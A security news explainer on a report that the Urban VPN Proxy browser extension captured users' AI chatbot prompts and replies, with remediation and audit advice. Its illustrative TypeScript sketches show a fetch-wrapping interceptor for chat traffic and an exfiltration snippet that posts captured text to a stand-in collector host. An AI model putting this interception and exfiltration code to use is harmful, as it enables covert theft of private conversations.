Researchers say the Urban VPN Proxy browser extension injected code on major AI sites to capture users’ prompts and chatbot replies and send them to remote servers—raising urgent privacy and compliance questions for anyone who used it.
What happened and who is involved
A recent security report alleges that Urban VPN Proxy, a free “VPN” extension for browsers, quietly added a capability that can collect user activity on popular AI chatbot websites. The concern is not about normal VPN routing alone. The report focuses on the extension’s ability to run scripts inside web pages, which can let it observe what people type and what they receive back—especially on sites like ChatGPT and Google Gemini, along with other major AI assistants.
Urban VPN Proxy is widely distributed through official extension stores and has been promoted as a privacy product. That creates a stark contrast with the allegation: a tool marketed for privacy may have been positioned to capture some of the most sensitive text people produce online today, including work drafts, legal questions, medical concerns, personal identifiers, and business plans—anything a user might paste into an AI chat.
The researchers' findings matter because browser extensions can have deep access. If a user grants an extension permission to "read and change" data on the websites they visit, that permission can apply to the content of pages, forms, and live web apps—including AI chat interfaces. In practice, that access can be more revealing than many users realize, because AI chats often contain private material that would never be posted publicly.
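To make that permission concrete, here is a minimal, hypothetical sketch of what a content script with "read and change" access to a chat site could do. The selector and message names are illustrative assumptions, not code recovered from Urban VPN Proxy:

```typescript
// content-script.ts (illustrative sketch only; the selector and message name
// are hypothetical, not taken from any real extension).
// An extension granted host access to a chat site can run code like this
// inside the page and observe what the user types before it is ever sent.

const promptBox = document.querySelector<HTMLTextAreaElement>("textarea");

if (promptBox) {
  promptBox.addEventListener("input", () => {
    // Every keystroke updates the value the script can read.
    const draftPrompt = promptBox.value;

    // The text can then be handed to the extension's background logic.
    chrome.runtime.sendMessage({ type: "draft-observed", text: draftPrompt });
  });
}
```

Nothing in this sketch depends on whether any VPN tunnel is active; the script runs simply because the page matched the extension's host permissions.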
Timeline: how this became a security issue
Researchers tied the alleged AI conversation capture to an update introduced in July 2025, describing it as a meaningful behavior change compared with earlier versions. The key risk with extensions is that updates can happen automatically. A user who installed a tool for one reason—like basic browsing privacy—may not notice when its behavior changes weeks or months later.
That is one reason extension incidents can spread quickly: distribution is centralized, updates are frequent, and permission models are broad. If an extension has millions of installs, even a short window of questionable behavior can affect a large number of people.
Here is a simple timeline based on the claims described in the research and the extension’s public update history:
| Date / period | Reported development | Why it matters |
| --- | --- | --- |
| Before July 2025 | Researchers say earlier builds did not include the AI-harvesting logic they later observed | Establishes a "before vs. after" shift in behavior |
| July 2025 | Researchers say AI-targeted collection was added and enabled by default | Users may have been exposed without taking any new action |
| Mid–late 2025 | Extension continues to be distributed and updated | Updates can keep the feature active or change how it works |
| Present concern | Users may not know prompts and replies could be collected | AI chats frequently include sensitive information |
This issue is not limited to one brand or one store. It highlights a pattern: any extension that combines broad site permissions with “analytics” or “marketing measurement” components can become a high-risk channel for data collection.
How the alleged collection works, in plain language
The report’s core claim is that Urban VPN Proxy used site-specific scripts that activate when users visit certain AI platforms. This matters because AI chat apps are interactive: they send your prompt to a server, and the response returns to your browser. If an extension can watch those requests and responses, it can reconstruct the conversation.
In simple terms, researchers described the behavior like this:
| Step | What happens | What it can expose |
| --- | --- | --- |
| 1 | The extension detects you opened a supported AI website | Which AI tools you use and when |
| 2 | It injects a script into the page (tailored to that AI site) | Access to the chat interface and the data flowing through it |
| 3 | The script monitors communication between the page and the AI service | Your prompts, the model's replies, and conversation metadata |
| 4 | Data is packaged and sent outward to remote endpoints | Centralized collection across many users |
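As an illustration of steps 2 and 3, an injected script can wrap the page's networking functions so that every call to the chat backend passes through it first. The "/conversation" path below is a hypothetical placeholder, and this is a generic sketch of the technique described in the research, not the extension's actual code:

```typescript
// injected.ts (generic sketch; the "/conversation" path is a hypothetical
// placeholder that would differ per AI site).
const originalFetch = window.fetch;

window.fetch = async (input: RequestInfo | URL, init?: RequestInit) => {
  const url =
    typeof input === "string" ? input : input instanceof URL ? input.href : input.url;

  // Step 3: watch traffic flowing between the page and the AI service.
  const looksLikeChatCall = url.includes("/conversation");
  const body = init?.body;
  const capturedPrompt = looksLikeChatCall && typeof body === "string" ? body : null;

  const response = await originalFetch(input, init);

  if (looksLikeChatCall) {
    // Clone the response so the page still receives the original untouched,
    // and read the copy without delaying the page.
    response
      .clone()
      .text()
      .then((capturedReply) => {
        console.debug("observed prompt:", capturedPrompt);
        console.debug("observed reply:", capturedReply);
        // Step 4, packaging and sending this outward, is sketched further below.
      });
  }

  return response;
};
```

Many chat front ends also stream replies over other channels, such as server-sent events or WebSockets, so a real interceptor would hook those too; the principle is the same.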
A key point in the findings is that this type of collection can happen even if the VPN “tunnel” feature is not actively being used. That distinction matters because many people assume a VPN extension only “does something” when they press connect. In reality, an extension can still run background processes and page scripts whenever the browser is open.
This also explains why AI sites are a special target. Unlike a normal static webpage, AI chats often involve long-form text. They may contain:
- Draft press releases, proposals, and unpublished articles.
- Personal stories and sensitive questions.
- Password reset emails pasted for “summarizing”.
- Company details, client notes, contract text, or financial figures.
Once text leaves a user’s browser environment, it can be stored, analyzed, shared, or re-sold—depending on how the collector operates and what policies or partnerships exist.
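For step 4 in the table above, transmission out of the browser is technically unremarkable. The collector URL, payload shape, and timing in this sketch are invented for illustration; the point is only that a page script can batch captured text and post it with no visible sign to the user:

```typescript
// Exfiltration sketch; the collector URL and record shape are hypothetical.
interface CapturedTurn {
  site: string;       // which AI service the user was on
  prompt: string;     // what the user typed
  reply: string;      // what the model returned
  capturedAt: number; // timestamp, useful for correlating activity over time
}

const queue: CapturedTurn[] = [];

function flush(): void {
  if (queue.length === 0) return;
  const payload = JSON.stringify(queue.splice(0, queue.length));
  // sendBeacon succeeds even while a page unloads and surfaces nothing to the user.
  navigator.sendBeacon("https://collector.example/ingest", payload);
}

// Small periodic batches keep the traffic unremarkable.
setInterval(flush, 30_000);
```

From the network's point of view, this looks like ordinary analytics traffic, which is part of why such behavior is hard to spot.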
What data may be at risk and why it's unusually sensitive
The reported concern is not merely “browsing history.” AI conversations can combine identity, intent, and context in one place. A single prompt might include a person’s name, phone number, work role, health question, and location. A response might include recommendations that reveal the user’s situation. Together, that can become a detailed profile.
Researchers described the data types as including user prompts and AI responses, plus surrounding metadata that can help connect activity over time. While exact captured fields can vary by platform and implementation, these are the typical categories involved in this kind of interception:
| Data category | Examples | Why it matters |
| --- | --- | --- |
| Prompts you type | Questions, drafts, pasted documents | Can include confidential or regulated information |
| AI replies | Generated answers and edits | Can reveal the topic even if the prompt is partial |
| Conversation metadata | Timestamps, session or conversation identifiers | Helps correlate activity across days and devices |
| Platform targeting | Which AI services you visited | Reveals tools used for work, school, or personal needs |
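One way to see why the metadata row matters is to imagine the captured categories as fields of a single record. The type and grouping below are a hypothetical illustration of how identifiers let scattered captures be stitched into a longer-term profile:

```typescript
// Hypothetical record combining the categories in the table above.
interface CapturedEvent {
  service: string;        // platform targeting: which AI site was visited
  conversationId: string; // conversation metadata: ties turns together
  prompt: string;         // what the user typed
  reply: string;          // what the model answered
  timestamp: number;      // when it happened
}

// Grouping events by a stable identifier turns isolated snippets into a
// timeline of one person's questions, drafts, and concerns.
function buildProfile(events: CapturedEvent[]): Map<string, CapturedEvent[]> {
  const byConversation = new Map<string, CapturedEvent[]>();
  for (const event of events) {
    const existing = byConversation.get(event.conversationId) ?? [];
    existing.push(event);
    byConversation.set(event.conversationId, existing);
  }
  return byConversation;
}
```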
The risk grows because many users treat AI chats like private notebooks. They paste content they would never publish. They also use AI assistants during time pressure, which can reduce caution (for example, “summarize this email thread” or “rewrite this contract clause”). That makes AI text streams especially valuable to advertisers, analytics firms, and data brokers—while also being dangerous if exposed.
Trust signals, extension policies, and why this keeps happening
One of the biggest real-world issues is that users often rely on trust signals—store placement, badges, big install counts, and polished branding—when deciding what to install. VPN tools are especially powerful because they promise protection and because people install them at moments when they feel vulnerable or exposed.
But the extension ecosystem has structural weaknesses:
- Permissions are broad: “Read and change data on websites you visit” can include access to forms, chats, and dynamic apps.
- Updates are silent: an extension can change behavior after install.
- Data flows are invisible: users can’t easily see what gets transmitted.
- Business models are murky: “free” privacy tools often monetize through traffic, partnerships, or analytics.
Most extension marketplaces have policies restricting abusive data practices, including limits on how data can be used or shared. But enforcement tends to be reactive and difficult at scale. Researchers and journalists often become the first line of defense, because they can reverse-engineer behavior and publicly document it.
This case also highlights a modern challenge: AI conversations are becoming a new class of sensitive data, but many privacy frameworks still treat them as general "web activity." In practice, AI prompts can be closer to emails, documents, or private messages than to ordinary browsing.
For publishers, businesses, and schools, the lesson is clear: “VPN extension” does not automatically mean “safer.” It can mean “more privileged access,” which is helpful when properly managed—and dangerous when misused.
What users and organizations should do now
If you used Urban VPN Proxy (or any similar free VPN extension), the safest approach is to treat this as a potential data exposure event and respond quickly and calmly.
Here are practical steps that do not require advanced technical skills:
| Action | What to do | Why it helps |
| --- | --- | --- |
| Remove the extension | Uninstall it completely (not just disable) | Stops page-level scripts and background data flows |
| Review extension permissions | Check which extensions can "read and change" site data | High-risk permission for chats, email, docs, banking |
| Separate work and personal browsing | Use separate browser profiles or separate browsers | Limits the blast radius if one profile is compromised |
| Rotate sensitive credentials | Change passwords for key accounts used in that browser | Reduces risk if sessions or account context was exposed |
| Revisit what you pasted into AI chats | Identify any secrets, keys, client info, or personal data | Guides what you should protect next |
| Add guardrails for future use | Avoid pasting private identifiers into chat tools | Reduces harm even if another tool is compromised |
For organizations (media companies, agencies, universities, startups), the best response is a combination of policy and technical controls:
- Maintain an approved extension list and block unknown installs.
- Run regular extension audits on managed devices (a simple audit sketch follows this list).
- Train staff that AI chats can carry sensitive data.
- Encourage “least privilege” browsing: fewer extensions, fewer permissions.
- Use enterprise browser controls where possible.
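The audit item above can be partly automated. The sketch below assumes it runs inside an internal extension that has been granted the "management" permission, which lets it enumerate other installed extensions; the patterns it flags are illustrative and would be tuned per organization:

```typescript
// audit.ts: a minimal sketch for an internal audit helper. It assumes the
// code runs in an extension holding the "management" permission.

const BROAD_HOST_PATTERNS = ["<all_urls>", "*://*/*"]; // "all sites" access

async function flagBroadlyPermissionedExtensions(): Promise<void> {
  const installed = await chrome.management.getAll();

  for (const ext of installed) {
    const hosts = ext.hostPermissions ?? [];
    const hasBroadAccess = hosts.some((h) => BROAD_HOST_PATTERNS.includes(h));

    if (ext.enabled && hasBroadAccess) {
      // Anything that can read and change data on every site can also read
      // AI chats, webmail, and documents, so it deserves a manual review.
      console.warn(`Review: ${ext.name} (${ext.id}) has host access:`, hosts);
    }
  }
}

flagBroadlyPermissionedExtensions();
```

Results like these should feed a review queue rather than automatic removal; broad host access is legitimate for some tools, which is exactly why it needs human judgment.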
Finally, if a user believes they shared regulated data (such as client PII, medical data, legal documents, or credentials), it may be appropriate to follow internal incident procedures. The goal is not panic. The goal is minimizing risk and preventing repeat exposure.